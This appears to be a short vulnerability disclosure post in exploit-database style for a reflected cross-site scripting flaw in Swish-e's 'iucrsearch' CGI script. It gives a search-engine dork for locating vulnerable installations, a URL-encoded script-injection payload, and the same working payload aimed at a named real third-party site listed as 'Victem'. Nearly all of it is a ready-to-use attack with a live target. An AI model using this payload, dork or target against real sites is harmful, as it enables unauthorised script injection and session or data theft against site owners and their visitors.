######################################################### --------------------------------------------------------- Portal Name: Swish-e Vendor : http://Swish-e.org Vulnerable File : iucrsearch Dork: Powered by Swish-e swish-e.org Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : XSS (Cross site scripting) --------------------------------------------------------- ######################################################### http://site.com/cgi-bin/iucrsearch?query=%5C%22%3E%3C%3CSCRIPT%3Ealert%28%2FXSS+by+Pouya%2F%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&submit=Search&si=0 --------------------------------- Victem : http://scripts.iucr.org/cgi-bin/iucrsearch?query=%5C%22%3E%3C%3CSCRIPT%3Ealert%28%2FXSS+by+Pouya%2F%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&submit=Search&si=0